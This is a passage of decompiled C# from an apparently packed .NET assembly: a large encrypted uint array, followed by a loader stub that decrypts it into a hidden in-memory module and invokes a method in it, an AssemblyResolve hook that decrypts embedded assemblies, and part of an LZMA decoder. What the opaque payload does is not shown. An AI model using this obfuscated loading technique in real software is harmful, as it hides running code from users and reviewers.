   3321810130U,
   3958942432U,
   3424831919U,
   863479976U,
   4123610284U,
   3070665118U,
   3611453772U,
   556841876U,
   3862932243U,
   3392642916U,
   3358320042U,
   3031744120U,
   3571495444U,
   631845459U,
   1051260338U,
   955530258U,
   1336314217U,
   2784406383U,
   4164421595U,
   2196179741U,
   421523575U,
   504255841U,
   1778720530U,
   3854213343U,
   1471026831U,
   2640607948U,
   3806683454U,
   775524810U,
   3142147566U,
   1684435498U,
   2451622494U,
   3072308683U,
   3593637921U,
   2342070086U,
   1685038597U,
   3103174043U,
   2421846440U,
   1432717577U,
   464294282U,
   1426988851U,
   3615229701U,
   634895419U,
   2720874608U,
   1157484294U,
   1132705565U,
   2592171934U,
   1388435916U,
   3102212617U,
   1967555689U,
   4225430U,
   3984690598U,
   2797783155U,
   143304068U,
   2500871094U,
   4072862785U,
   3042053674U,
   666158474U,
   197075591U,
   1378242870U,
   1450161094U,
   3521581441U,
   804642823U,
   2929117412U,
   4151087244U,
   623245720U,
   2230646313U,
   986689107U,
   1993883233U,
   2428338234U,
   2798459589U,
   1536794875U,
   969458699U,
   1899968015U,
   3843554918U,
   1870896180U,
   3005021385U,
   2073813411U,
   1614522824U,
   3694408829U,
   1996763280U,
   3363929978U,
   3162968460U,
   3223029829U,
   1080027523U,
   1016138884U,
   807827149U,
   1191694638U,
   378231133U,
   2060870897U,
   897081781U,
   3717839010U,
   798210670U,
   3694227931U,
   1945496913U,
   1079474698U,
   1955453469U,
   4215898859U,
   1492151014U,
   3229973373U,
   3639684515U,
   1803819340U,
   1355564361U,
   2490930894U,
   2051341171U,
   2444831891U,
   2793045492U,
   2511196714U,
   3181049171U,
   3166038359U,
   1843673646U,
   2956538259U,
   3635585845U,
   552568469U,
   2684489586U,
   2526146911U,
   3242776769U,
   2846552549U,
   296006262U,
   3238855268U,
   2483986739U,
   3939913194U,
   204291837U,
   2547450151U,
   3810292437U,
   1300351632U,
   534815472U,
   91737439U,
   28624293U,
   2518468823U,
   2248702399U,
   932103765U,
   263019096U,
   3805274628U,
   3627479619U,
   3508267383U,
   953306501U,
   1113379199U,
   3042251406U,
   4123790583U,
   1955048545U,
   3947058059U,
   2960452965U,
   1771976510U,
   3168666854U,
   482023475U,
   3463558487U,
   2357709711U,
   2872971538U,
   793311008U,
   3928372542U,
   2685947178U,
   21187966U,
   309415372U,
   2714535324U,
   4025762345U,
   409700065U,
   950002317U,
   2553088365U,
   349285332U,
   2765972309U,
   3551523721U,
   485529918U,
   2748572321U,
   1694178747U,
   3724846513U,
   3399255668U,
   2718865765U,
   617627594U,
   208920872U,
   1381573612U,
   4193135579U,
   90179177U,
   1939136420U,
   241137278U,
   2645227212U,
   124423365U,
   466319738U,
   1814130018U,
   2463635673U,
   3230839395U,
   3951764804U,
   3273992472U,
   1417399461U,
   1632988937U,
   2890901417U,
   2518494935U,
   1505587130U,
   4166979484U,
   1004533441U,
   1713437530U,
   2928654953U,
   3672440512U,
   202841665U,
   2819728122U,
   871648087U,
   3561232798U,
   2273338943U,
   1020165502U,
   2373244881U,
   995000625U,
   664668718U,
   711004751U,
   1546205208U,
   2181861399U,
   2751465018U,
   2577179576U,
   3545137784U,
   2479565340U,
   3355529093U,
   719475193U,
   1466788842U,
   2565144178U,
   4209892283U,
   2565442583U,
   1251485021U,
   965910145U,
   2313485387U,
   3021549719U,
   2779251048U,
   3393380649U,
   4147893181U,
   1455235547U,
   2458188081U,
   235475342U,
   1816272719U,
   745414364U,
   679442805U,
   2531945566U,
   2679227260U,
   1691844430U,
   1641339492U,
   2466174856U,
   1028208989U,
   3995341952U,
   953646328U,
   559650394U,
   259616607U,
   1222571064U,
   3365281269U,
   779343462U,
   2146420774U,
   3978907376U,
   141699074U,
   3207185790U,
   1617000576U,
   1168837382U,
   2372573971U,
   3892725703U,
   2503411869U,
   4283944753U,
   26369702U,
   1172199978U,
   2704144713U,
   1029348255U,
   2024688034U,
   2612209948U,
   1555708920U,
   662671980U,
   3120850390U,
   859672385U,
   1492082995U,
   2278261176U,
   3383619591U,
   2167073496U,
   498153544U,
   631130237U,
   1628350265U,
   4035066248U,
   1923462672U,
   419045589U,
   1137043435U,
   3430298807U,
   2913818966U,
   2796942846U,
   3488569534U,
   2420849759U,
   1987740675U,
   1353676357U,
   485891800U,
   588881291U,
   359005206U,
   50298507U,
   1864801288U,
   4294885512U,
   4160486196U,
   1269076604U,
   110350440U,
   1082281760U,
   1747530144U,
   3039255768U,
   939196567U,
   3312861148U,
   2959310665U,
   2681423423U,
   3022162172U,
   1352019916U,
   3282492801U,
   38126266U,
   436770750U,
   45826252U,
   2521953168U,
   2914597928U,
   1320678084U,
   1464836669U,
   1064150942U,
   2133297096U,
   3237090479U,
   1114286715U,
   3909976854U,
   1119927737U,
   586345587U,
   2810472962U,
   394211005U,
   328167924U,
   265297151U,
   3054673530U,
   4291251646U,
   2321043354U,
   1342115331U,
   2360252196U,
   3126860541U,
   3897493034U,
   3907584935U,
   2727538329U,
   1979723650U,
   1110153365U,
   1610140644U,
   4157577022U,
   519041185U,
   935350087U,
   3577176464U,
   2911091510U,
   1469328476U,
   3658450824U,
   2766274623U,
   331282724U,
   2398546079U,
   3611061375U,
   1902865372U,
   2583430409U,
   536123864U,
   1329158570U,
   2696229584U,
   1814729067U,
   1181736387U,
   2791866574U,
   71301474U,
   1919817626U,
   1015982684U,
   291465496U,
   1455640399U,
   1289006854U,
   3862881051U,
   1294677319U,
   281953668U,
   3823898452U,
   2774818905U,
   3291267743U,
   3708136288U,
   567787958U,
   2653033164U,
   2759245730U,
   3714068995U,
   2462082894U,
   2922814197U,
   3759686688U,
   2441693417U,
   3850939157U,
   3527812116U,
   1246139469U,
   4051530901U,
   2846364400U,
   3631599421U,
   2111082893U,
   3228120710U,
   2890910152U,
   681669125U,
   2045498419U,
   3119611686U,
   3980449887U,
   2253471197U,
   3415921137U,
   4093736225U,
   965008539U,
   3941740246U,
   2592510614U,
   2395755038U,
   2687064436U,
   2449926789U,
   880156368U,
   3730641773U,
   3259952729U,
   3642489485U,
   1428479594U,
   1653155474U,
   4028890345U,
   3189331479U,
   2129967931U,
   3505489973U,
   1226091757U,
   1919688397U,
   1942703824U,
   3886916539U,
   1357630701U,
   1842084311U,
   2632854381U,
   1585389762U,
   3594125245U,
   1886678703U,
   2916449849U,
   3240747646U,
   174951831U,
   1012821457U,
   1594079004U,
   4177290633U,
   359558328U,
   1188922974U,
   478148528U,
   2484131559U,
   3652157999U,
   1219156946U,
   4002591119U,
   3711950770U,
   1301336604U,
   1653351096U,
   2729356516U,
   723882790U,
   3255256600U,
   2276702664U,
   2205894767U,
   1938324324U,
   3714215306U,
   3730940727U,
   1248676463U,
   1495463680U,
   918874565U,
   4060904111U,
   730871287U,
   227022351U,
   453276840U,
   1089761344U,
   2279866774U,
   2965867837U,
   1126496085U,
   2102270344U,
   1114810665U,
   2633503552U,
   2980665959U,
   1914872185U,
   1118997777U,
   1407723296U,
   2282157355U,
   3109236358U,
   1413415114U,
   1590719419U,
   3668650128U,
   4162360160U,
   756270384U,
   1819407293U,
   2955174985U,
   1404394921U,
   1352816471U,
   1408782864U,
   3176656279U,
   1122293492U,
   683189117U,
   3807472330U,
   405149446U,
   1955094558U,
   772210690U,
   1786934044U,
   3597197659U,
   3866744471U,
   647457465U,
   3745185419U,
   699546551U,
   1006115341U,
   3367309070U,
   1853559115U,
   2539771920U,
   2074035543U,
   866363947U,
   870314195U,
   155572530U,
   402904960U,
   2644061064U,
   2042132942U,
   928795795U,
   2622728690U,
   608462297U,
   2935595531U,
   3892390256U,
   2377007981U,
   99464661U,
   2468099272U,
   3382280004U,
   3374432969U,
   1770187421U,
   3428099837U,
   2082674324U,
   2005986923U,
   2876459171U,
   2932756426U,
   1028972133U,
   699878203U,
   2282627024U,
   3059482018U,
   2162152707U,
   2690886726U,
   2201636116U,
   3925161269U,
   1454003540U,
   4200917536U,
   2523658694U,
   2479336223U,
   300307187U,
   4153052605U,
   3307007892U,
   4172215683U,
   3271328207U,
   64577389U,
   3496323750U,
   1581012099U,
   2038164321U,
   2869241313U,
   1913755455U,
   1102686123U,
   661615921U,
   3799151276U,
   2403222504U,
   3050462744U,
   484930126U,
   2105004048U,
   1660198451U,
   3644228049U,
   3555025475U,
   839989289U,
   298488530U,
   3936823353U,
   1433191305U,
   1827175376U,
   974929985U,
   2358711370U,
   276481641U,
   1811263575U,
   3732982765U,
   2520379886U,
   3702892914U,
   3469683239U,
   1967993695U,
   1252740405U,
   3611258742U,
   2123884893U,
   112883049U,
   3576281119U,
   3978531259U,
   2709071052U,
   1875165043U,
   441598352U,
   3133369370U,
   2444186240U,
   1348571752U,
   1737432458U,
   600096531U,
   2306508825U,
   3628937331U,
   3455856970U,
   2063173172U,
   4045217791U,
   3265607889U,
   1210700634U,
   3133043133U,
   526887200U,
   3448837987U,
   4219481396U,
   1356204427U,
   275979462U,
   3100653220U,
   1662753911U,
   1310951175U,
   327955729U,
   3676816217U,
   1950597215U,
   4143770000U,
   1624551495U,
   1098265574U,
   2134536928U,
   3999543424U,
   2604934320U,
   2918153697U,
   2542534320U,
   122051555U,
   678028397U,
   319617867U,
   711338986U,
   2285587807U,
   554759063U,
   147396141U,
   1749482984U,
   3741661818U,
   3142368757U,
   3252609549U,
   3793488181U,
   1024947152U,
   3465050061U,
   3498488849U,
   354152971U,
   3514591054U,
   3994996885U,
   2351657841U,
   2714769578U,
   255082145U,
   3572160009U,
   614063749U,
   2472972107U,
   3808218017U,
   3045357021U,
   3257575359U,
   1148733141U,
   681947388U,
   3228979129U,
   3471394825U,
   1402993543U,
   3209738529U,
   1631210148U,
   3320282952U,
   2313620212U,
   3983528356U,
   1079438396U,
   789643646U,
   887194199U,
   483717700U,
   1502927719U,
   4147000394U,
   443456539U,
   3277416704U,
   3112234302U,
   2803568599U,
   1856286158U,
   3809991810U,
   2426717057U,
   19761189U,
   4202905290U,
   2061885255U,
   2844088990U,
   1026293539U,
   3323367911U,
   1787310543U,
   4019384316U,
   3760797383U,
   3888289691U,
   1715269192U,
   52156783U,
   2366706876U,
   3597111612U,
   3978737063U,
   3021625370U,
   1042250729U,
   2837712771U,
   2314537839U,
   441130280U,
   32367207U,
   2065156256U,
   3368410562U,
   3143656557U,
   1674609100U,
   78407358U,
   1512736804U,
   3307845338U,
   2500069463U,
   4245971529U,
   4164867431U,
   3317412612U,
   1393239285U,
   3181684963U,
   337844816U,
   1764626814U,
   2381168187U,
   1022128267U,
   478361544U,
   471197233U,
   1508240420U,
   1946720673U,
   996478324U,
   1440242476U,
   4251684805U,
   400734392U,
   97017614U,
   1202906411U,
   2604246158U,
   2849994831U,
   1251313867U,
   2854858188U,
   1041341748U,
   917439918U,
   1520890204U,
   3054120782U,
   2018091652U,
   4226087482U,
   226859915U,
   3974168180U,
   2471968762U,
   17922459U,
   2082230647U,
   1026437328U,
   2652875617U,
   3056008360U,
   233369417U,
   4075513370U,
   1045619649U,
   4059080607U,
   749649026U,
   2638759672U,
   4152512221U,
   3839336060U,
   2390191158U,
   1046059993U,
   3532692640U,
   53198089U,
   3273926734U,
   2047444067U,
   4054878903U,
   1376573233U,
   2056026719U,
   2516676366U,
   10701030U,
   3977248215U,
   4290055078U,
   3362890086U,
   2230440213U,
   3970592112U,
   2484191976U,
   1237939853U,
   3532335673U,
   1212558369U,
   467842846U,
   1905842294U,
   2185223793U,
   3326243991U,
   2189658651U,
   1259034166U,
   2477450327U,
   1924364963U,
   1468596062U,
   2364564440U,
   1224940911U,
   4110537425U,
   3114520465U,
   3443471465U,
   1514627942U,
   1391830866U,
   2979185144U,
   3237863266U,
   1810588764U,
   2908371936U,
   2709216029U,
   376022081U,
   1673754467U,
   1321250318U,
   1844160387U,
   2640687357U,
   782174195U,
   4242327145U,
   251817674U,
   2278188478U,
   1600597880U,
   2563392436U,
   2080821317U,
   214545737U,
   608216728U,
   1559334518U,
   2681976446U,
   1854008365U,
   3621793330U,
   1005315087U,
   52106447U,
   1031395540U,
   296768503U,
   517539023U,
   2255222237U,
   1658747910U,
   881456285U,
   1894841218U,
   685695219U,
   145194254U,
   4210373858U,
   177605507U,
   3285993829U,
   2231857851U,
   1363393688U,
   808268735U,
   1954430583U,
   350154760U,
   4073311239U,
   780829604U,
   3318062670U,
   4227219790U,
   2407951218U,
   2286890254U,
   2180353154U,
   2648221501U,
   2570542173U,
   3751308825U,
   4219684424U,
   2887566952U,
   2363535237U,
   1795038812U,
   2375310488U,
   3168938728U,
   3653298075U,
   44767259U,
   305092690U,
   518454478U,
   1805793255U,
   4034266808U,
   2805815492U,
   1435335679U,
   303386540U,
   3406818615U,
   3373741529U,
   3187732525U,
   900075092U,
   222201386U,
   2752991102U,
   510248828U,
   3299668685U,
   3948950610U,
   398121525U,
   1767921375U,
   3063330394U,
   3623644322U,
   2528615186U,
   1992644820U,
   2185191233U,
   2348955940U,
   1814942338U,
   4033625280U,
   503698944U,
   499784897U,
   3265916646U,
   1607087498U,
   1497898716U,
   1049375704U,
   754324248U,
   1081056836U,
   1254454236U,
   1468898417U,
   864401137U,
   160488703U,
   2685796086U,
   4277376394U,
   4000937584U,
   3200436635U,
   3642440496U,
   751016252U,
   2265298698U,
   1909953297U,
   784938545U,
   3613165274U,
   3756211358U,
   2835781485U,
   2127348846U,
   2056259106U,
   3188631092U,
   1083792005U,
   211506820U,
   1097649559U,
   2802377141U,
   863913592U,
   3486108070U,
   3079189550U,
   4026915334U,
   1970779957U,
   1809450845U,
   1299567514U,
   225933945U,
   2273041819U,
   2281612662U,
   1405269313U,
   70366897U,
   1010994564U,
   193051718U,
   1695871585U,
   3496132855U,
   1477987832U,
   107810469U,
   2406864476U,
   2762167113U,
   71003331U,
   2972156160U,
   552418389U,
   2035746467U,
   317458496U,
   3180176715U,
   1788488820U,
   4177305399U,
   342580024U,
   2536720196U,
   576498656U,
   1615134393U,
   2318761174U,
   3853278329U,
   1639655808U,
   453975536U,
   690239861U,
   1065892576U,
   85533587U,
   1870390629U,
   34554073U,
   2785891708U,
   2347093395U,
   4013882595U,
   2986842766U,
   3210085570U,
   1582373062U,
   1960457229U,
   1917029882U,
   4253484827U,
   1282155437U,
   436341776U,
   1719812374U,
   2908416653U,
   2538046245U,
   1690365388U,
   1720814573U,
   2850774197U,
   3932554037U,
   2336693471U,
   1096606098U,
   620990506U,
   3530547070U,
   2469908754U,
   1144400355U,
   1457327234U,
   485031156U,
   1546596455U,
   2002765303U,
   1185701711U,
   2472032625U,
   2252729145U,
   4036532115U,
   1673749367U,
   1693031720U,
   3774720859U,
   2869239137U,
   4141699443U,
   1765248755U,
   1807278901U,
   2339814182U,
   3971644937U,
   3590676915U,
   2808771108U,
   2645876370U,
   1082243282U,
   3277770324U,
   1083092745U,
   57833822U,
   1932028846U,
   533623815U,
   1596402344U,
   210960503U,
   713496720U,
   1820047525U,
   477256759U,
   1731222103U,
   2916117395U,
   830654259U,
   2279205641U,
   268609196U,
   275516739U,
   2254288911U,
   2316542872U,
   844052622U,
   3407215538U,
   2702803772U,
   4190605818U,
   2867727642U,
   193664990U,
   4292714501U,
   2302028825U,
   2645596145U,
   850797524U,
   3477764877U,
   2764778219U,
   975951328U,
   3447809294U,
   706224829U,
   1326413080U,
   1045142270U,
   2800478324U,
   1840373797U,
   3906900653U,
   938638477U,
   1935889646U,
   138288328U,
   3265341008U,
   3736266198U,
   2503247470U,
   3459405888U,
   2441220265U,
   4162172376U,
   2077700550U,
   51851722U,
   1928899002U,
   3620948152U,
   2566138317U,
   2637889278U,
   2447180583U,
   1107542869U,
   295590487U,
   3580175655U,
   2049172530U,
   2165707380U,
   212493624U,
   104339015U,
   1177675398U,
   3578775197U,
   3612137930U,
   13434589U,
   3387644884U,
   4241496608U,
   226922728U,
   2835590250U,
   3683441713U,
   592601298U,
   924448771U,
   1911351316U,
   1263802786U,
   899797365U,
   2113610089U,
   778219712U,
   2529579270U,
   3207606659U,
   578743618U,
   1533845175U,
   3013666381U,
   4191935624U,
   553336170U,
   4118624197U,
   3015474748U,
   3502536587U,
   2896550610U,
   2361016078U,
   2616311153U,
   2667869212U,
   582800545U,
   1977146870U,
   1221707513U,
   2241977671U,
   418934230U,
   2420818111U,
   3959365399U,
   971123200U,
   69545973U,
   969990939U,
   2232857107U,
   1502520397U,
   3197926218U,
   1460004452U,
   2538464599U,
   1183603441U,
   197764748U,
   992250999U,
   3160393773U,
   1217712229U,
   2824537542U,
   43058990U,
   3613429059U,
   3593930720U,
   4231608698U,
   3711618583U,
   1703500442U,
   1484837520U,
   1004144902U,
   3867389187U,
   2887672720U,
   2040724411U,
   270900472U,
   2364822388U,
   1526873973U,
   4107842132U,
   1498214531U,
   3807321614U,
   781493015U,
   239574785U,
   1246482368U,
   3332886689U,
   3250357798U,
   4151972631U,
   3096780923U,
   1032042045U,
   268128406U,
   1319989437U,
   2178698369U,
   2542734740U,
   2183394960U,
   3387040379U,
   2704277631U,
   3174258532U,
   125204530U,
   2676622582U,
   3920216819U,
   2136174024U,
   416398071U,
   3754131279U,
   3067773441U,
   3915041987U,
   351094495U,
   674731605U,
   305878278U,
   3730948669U,
   3401455142U,
   3143742084U,
   3822793248U,
   2138304907U,
   1769231844U,
   3495897757U,
   416822618U,
   69618312U,
   3516188957U,
   64443925U,
   3945347633U,
   1520182617U,
   2386713683U,
   2536438325U,
   4227170106U,
   2853367760U,
   2155628747U,
   3272077046U,
   2603206171U,
   715569164U,
   771678159U,
   2836605673U,
   3689832017U,
   2969380130U,
   2484643733U,
   2767991618U,
   3863324415U,
   4126897297U,
   1093648133U,
   3401724287U,
   3070442686U,
   4174028799U,
   498287706U,
   4108456632U,
   3731530199U,
   3332737343U,
   2110125146U,
   1450861706U,
   3899796516U,
   806623952U,
   404213910U,
   1766800573U,
   246357134U,
   465007763U,
   2985752504U,
   832127967U,
   1307762206U,
   2396740281U,
   4060383010U,
   1047015221U,
   1560255145U,
   2915315795U,
   2487036640U,
   2673434142U,
   2434694172U,
   1000654899U,
   1329077226U,
   91525547U,
   2603881212U,
   1330332781U,
   3533508316U,
   486798854U,
   170913415U,
   1971650086U,
   287635584U,
   3540641725U,
   3552456758U,
   2338748964U,
   3860509458U,
   3304593358U,
   1595582931U,
   2728186237U,
   1710578143U,
   3069113162U,
   850825345U,
   85105605U,
   4014854526U,
   1090043217U,
   1476929628U,
   85851642U,
   244396813U,
   98457633U,
   502864777U,
   1804211609U,
   3155491372U,
   1567675865U,
   474419121U,
   1145638611U,
   515350295U,
   1346984507U,
   2898975320U,
   562711981U,
   1140039044U,
   2737589489U,
   313936664U,
   4187020948U,
   911297002U,
   2461772880U,
   3928843452U,
   1431543806U,
   3694220210U,
   3823741795U,
   587620345U,
   31235454U,
   933508415U,
   2410173759U,
   344393562U,
   4172363496U,
   1920526947U,
   4171802075U,
   3070807527U,
   46735268U,
   2838184434U,
   493406071U,
   1631898450U,
   158087601U,
   1388587532U,
   293610023U,
   1608571618U,
   750634441U,
   1880364313U,
   1228883146U,
   3760516332U,
   3299106759U,
   1259316597U,
   2143096977U,
   2665744619U,
   4205403511U,
   3556708793U,
   338977090U,
   3728465417U,
   195079879U,
   1618630859U,
   3264498634U,
   1728131210U,
   1680930899U,
   3126588061U,
   959340841U,
   543969209U,
   4507912U,
   2676631582U,
   426023015U,
   4247261643U,
   3594097372U,
   4250472189U,
   2729397073U,
   749531727U,
   1970525185U,
   1758718644U,
   4100668316U,
   3137482681U,
   568826986U,
   2248775140U,
   2230508247U,
   4185763765U,
   3993992332U,
   1953918222U,
   2376273225U,
   3384762370U,
   4264347513U,
   2091516776U,
   2986806937U,
   395389481U,
   1944593920U,
   80986310U,
   21777301U,
   4116274016U,
   320597723U,
   4059308U,
   3428044274U,
   2681979264U,
   3650819267U,
   498256804U,
   3511391935U,
   1429177800U,
   2786419282U,
   4146587514U,
   1619184565U,
   184294478U,
   2193108831U,
   2886576796U,
   3933530696U,
   774076919U,
   2327775171U,
   1582914359U,
   3358698739U,
   3699588179U,
   3343938407U,
   2071264212U,
   1592132424U,
   3676091619U,
   3459456367U,
   435334995U,
   619501979U,
   1624688746U,
   979603013U,
   1108747524U,
   3922063508U,
   3781339202U,
   3305564054U,
   2303544151U,
   1857620848U,
   3931750986U,
   1729833608U,
   3584171643U,
   2240694049U,
   1276387476U,
   4268284850U,
   3627313437U,
   2436557952U,
   3742694993U,
   256816831U,
   36864508U,
   861085811U,
   3942785975U,
   2121519974U,
   2980111354U,
   3064504383U,
   3268489714U,
   3672939733U,
   2955902792U,
   2257433762U,
   3785378301U,
   1878022722U,
   2044385677U,
   2796292510U,
   798657579U,
   2511008760U,
   1739078019U,
   3915553843U,
   858625859U,
   3932575613U,
   2382292867U,
   2854115837U,
   963200349U,
   97523304U,
   2057133381U,
   220733578U,
   3739524120U,
   888977507U,
   1705318001U,
   436686339U,
   1165773899U,
   345807871U,
   1614597149U,
   1604113701U,
   1542575489U,
   948311938U,
   727127006U,
   2386234679U,
   2270191626U,
   2433734053U,
   1208327244U,
   1964212065U,
   3525143568U,
   2887820104U,
   79857158U,
   3095016212U,
   3193859099U,
   2345797626U,
   1486489104U,
   2564531287U,
   3758300015U,
   2893965176U,
   1159664902U,
   4238054281U,
   4004554516U,
   1614566747U,
   679868631U,
   2366125925U,
   3261784684U,
   752044709U,
   1509708066U,
   3752099281U,
   563885371U,
   790708185U,
   109319672U,
   997424536U,
   4209798988U,
   417115700U,
   1854140015U,
   2657015755U,
   3125675270U,
   891359211U,
   784645404U,
   462223245U,
   4244160625U,
   936960566U,
   3441292421U,
   291830638U,
   2785019884U,
   2880903228U,
   2082545398U,
   1364284460U,
   2872233832U,
   3534172926U,
   3801672439U,
   1240509124U,
   855105288U,
   3029545288U,
   3504878216U,
   1369760530U,
   3140116866U,
   181462325U,
   3219080329U,
   190073758U,
   1460784952U,
   4293889391U,
   2463494565U,
   2251577794U,
   586787054U,
   577674211U,
   34156509U,
   314679667U,
   3536885507U,
   854055424U,
   875068624U,
   3601736529U,
   587009494U,
   262248323U,
   3394755176U,
   781657358U,
   3095676633U,
   1117031255U,
   3443594643U
  };
  Assembly executingAssembly = Assembly.GetExecutingAssembly();
  Module manifestModule = executingAssembly.ManifestModule;
  GCHandle gchandle = <Module>.Decrypt(array, 3835457050U);
  byte[] array2 = (byte[])gchandle.Target;
  Module module = executingAssembly.LoadModule("koi", array2);
  Array.Clear(array2, 0, array2.Length);
  gchandle.Free();
  Array.Clear(array, 0, array.Length);
  <Module>.key = manifestModule.ResolveSignature(285212673);
  AppDomain.CurrentDomain.AssemblyResolve += <Module>.Resolve;
  module.GetTypes();
  MethodBase methodBase = module.ResolveMethod((int)<Module>.key[0] | (int)<Module>.key[1] << 8 | (int)<Module>.key[2] << 16 | (int)<Module>.key[3] << 24);
  object[] array3 = new object[methodBase.GetParameters().Length];
  if (array3.Length != 0)
  {
   array3[0] = A_0;
  }
  object obj = methodBase.Invoke(null, array3);
  if (obj is int)
  {
   return (int)obj;
  }
  return 0;
 }


 // Token: 0x06000003 RID: 3 RVA: 0x00008DF8 File Offset: 0x00006FF8
 private static Assembly Resolve(object A_0, ResolveEventArgs A_1)
 {
  byte[] bytes = Encoding.UTF8.GetBytes(new AssemblyName(A_1.Name).FullName.ToUpperInvariant());
  Stream stream = null;
  if (bytes.Length + 4 <= <Module>.key.Length)
  {
   for (int i = 0; i < bytes.Length; i++)
   {
    byte[] array = bytes;
    int num = i;
    array[num] *= <Module>.key[i + 4];
   }
   string name = Convert.ToBase64String(bytes);
   stream = Assembly.GetEntryAssembly().GetManifestResourceStream(name);
  }
  if (stream != null)
  {
   uint[] array2 = new uint[stream.Length >> 2];
   byte[] array3 = new byte[256];
   int num2 = 0;
   int num3;
   while ((num3 = stream.Read(array3, 0, 256)) > 0)
   {
    Buffer.BlockCopy(array3, 0, array2, num2, num3);
    num2 += num3;
   }
   uint num4 = 7339873U;
   foreach (byte b in bytes)
   {
    num4 = num4 * 6176543U + (uint)b;
   }
   GCHandle gchandle = <Module>.Decrypt(array2, num4);
   byte[] array5 = (byte[])gchandle.Target;
   Assembly result = Assembly.Load(array5);
   Array.Clear(array5, 0, array5.Length);
   gchandle.Free();
   Array.Clear(array2, 0, array2.Length);
   return result;
  }
  return null;
 }


 // Token: 0x06000004 RID: 4 RVA: 0x00008F3C File Offset: 0x0000713C
 internal static byte[] Decompress(byte[] A_0)
 {
  MemoryStream memoryStream = new MemoryStream(A_0);
  <Module>.LzmaDecoder lzmaDecoder = new <Module>.LzmaDecoder();
  byte[] array = new byte[5];
  memoryStream.Read(array, 0, 5);
  lzmaDecoder.SetDecoderProperties(array);
  long num = 0L;
  for (int i = 0; i < 8; i++)
  {
   int num2 = memoryStream.ReadByte();
   num |= (long)((long)((ulong)((byte)num2)) << 8 * i);
  }
  byte[] array2 = new byte[(int)num];
  MemoryStream memoryStream2 = new MemoryStream(array2, true);
  long num3 = memoryStream.Length - 13L;
  lzmaDecoder.Code(memoryStream, memoryStream2, num3, num);
  return array2;
 }


 // Token: 0x04000001 RID: 1
 private static byte[] key;


 // Token: 0x04000002 RID: 2 RVA: 0x00002050 File Offset: 0x00000250
 static <Module>.DataType DataField;


 // Token: 0x02000002 RID: 2
 [StructLayout(LayoutKind.Explicit, Pack = 1, Size = 26656)]
 private struct DataType
 {
 }


 // Token: 0x02000003 RID: 3
 private struct BitDecoder
 {
  // Token: 0x06000006 RID: 6 RVA: 0x00008872 File Offset: 0x00006A72
  internal void Init()
  {
   this.Prob = 1024U;
  }


  // Token: 0x06000007 RID: 7 RVA: 0x00008FC8 File Offset: 0x000071C8
  internal uint Decode(<Module>.Decoder A_1)
  {
   uint num = (A_1.Range >> 11) * this.Prob;
   if (A_1.Code < num)
   {
    A_1.Range = num;
    this.Prob += 2048U - this.Prob >> 5;
    if (A_1.Range < 16777216U)
    {
     A_1.Code = (A_1.Code << 8 | (uint)((byte)A_1.Stream.ReadByte()));
     A_1.Range <<= 8;
    }
    return 0U;
   }
   A_1.Range -= num;
   A_1.Code -= num;
   this.Prob -= this.Prob >> 5;
   if (A_1.Range < 16777216U)
   {
    A_1.Code = (A_1.Code << 8 | (uint)((byte)A_1.Stream.ReadByte()));
    A_1.Range <<= 8;
   }
   return 1U;
  }


  // Token: 0x04000003 RID: 3
  private uint Prob;
 }


 // Token: 0x02000004 RID: 4
 private struct BitTreeDecoder
 {
  // Token: 0x06000008 RID: 8 RVA: 0x0000887F File Offset: 0x00006A7F
  internal BitTreeDecoder(int A_1)
  {
   this.NumBitLevels = A_1;
   this.Models = new <Module>.BitDecoder[1 << A_1];
  }


  // Token: 0x06000009 RID: 9 RVA: 0x000090B4 File Offset: 0x000072B4
  internal void Init()
  {
   uint num = 1U;
   while ((ulong)num < (ulong)(1L << (this.NumBitLevels & 31)))
   {
    this.Models[(int)((UIntPtr)num)].Init();
    num += 1U;
   }
  }


  // Token: 0x0600000A RID: 10 RVA: 0x000090EC File Offset: 0x000072EC
  internal uint Decode(<Module>.Decoder A_1)
  {
   uint num = 1U;
   for (int i = this.NumBitLevels; i > 0; i--)
   {
    num = (num << 1) + this.Models[(int)((UIntPtr)num)].Decode(A_1);
   }
   return num - (1U << this.NumBitLevels);
  }


  // Token: 0x0600000B RID: 11 RVA: 0x00009134 File Offset: 0x00007334
  internal uint ReverseDecode(<Module>.Decoder A_1)
  {
   uint num = 1U;
   uint num2 = 0U;
   for (int i = 0; i < this.NumBitLevels; i++)
   {
    uint num3 = this.Models[(int)((UIntPtr)num)].Decode(A_1);
    num <<= 1;
    num += num3;
    num2 |= num3 << i;
   }
   return num2;
  }


  // Token: 0x0600000C RID: 12 RVA: 0x0000917C File Offset: 0x0000737C
  internal static uint ReverseDecode(<Module>.BitDecoder[] A_0, uint A_1, <Module>.Decoder A_2, int A_3)
  {
   uint num = 1U;
   uint num2 = 0U;
   for (int i = 0; i < A_3; i++)
   {
    uint num3 = A_0[(int)((UIntPtr)(A_1 + num))].Decode(A_2);
    num <<= 1;
    num += num3;
    num2 |= num3 << i;
   }
   return num2;
  }


  // Token: 0x04000004 RID: 4
  private readonly <Module>.BitDecoder[] Models;


  // Token: 0x04000005 RID: 5
  private readonly int NumBitLevels;
 }


 // Token: 0x02000005 RID: 5
 private class Decoder
 {
  // Token: 0x0600000D RID: 13 RVA: 0x000091BC File Offset: 0x000073BC
  internal void Init(Stream A_1)
  {
   this.Stream = A_1;
   this.Code = 0U;
   this.Range = uint.MaxValue;
   for (int i = 0; i < 5; i++)
   {
    this.Code = (this.Code << 8 | (uint)((byte)this.Stream.ReadByte()));
   }
  }


  // Token: 0x0600000E RID: 14 RVA: 0x00008899 File Offset: 0x00006A99
  internal void ReleaseStream()
  {
   this.Stream = null;
  }


  // Token: 0x0600000F RID: 15 RVA: 0x000088A2 File Offset: 0x00006AA2
  internal void Normalize()
  {
   while (this.Range < 16777216U)
   {
    this.Code = (this.Code << 8 | (uint)((byte)this.Stream.ReadByte()));
    this.Range <<= 8;
   }
  }


  // Token: 0x06000010 RID: 16 RVA: 0x00009208 File Offset: 0x00007408
  internal uint DecodeDirectBits(int A_1)
  {
   uint num = this.Range;
   uint num2 = this.Code;
   uint num3 = 0U;
   for (int i = A_1; i > 0; i--)
   {
    num >>= 1;
    uint num4 = num2 - num >> 31;
    num2 -= (num & num4 - 1U);
    num3 = (num3 << 1 | 1U - num4);
    if (num < 16777216U)
    {
     num2 = (num2 << 8 | (uint)((byte)this.Stream.ReadByte()));
     num <<= 8;
    }
   }
   this.Range = num;
   this.Code = num2;
   return num3;
  }


  // Token: 0x06000011 RID: 17 RVA: 0x000088DC File Offset: 0x00006ADC
  internal Decoder()
  {
  }


  // Token: 0x04000006 RID: 6
  internal uint Code;


  // Token: 0x04000007 RID: 7
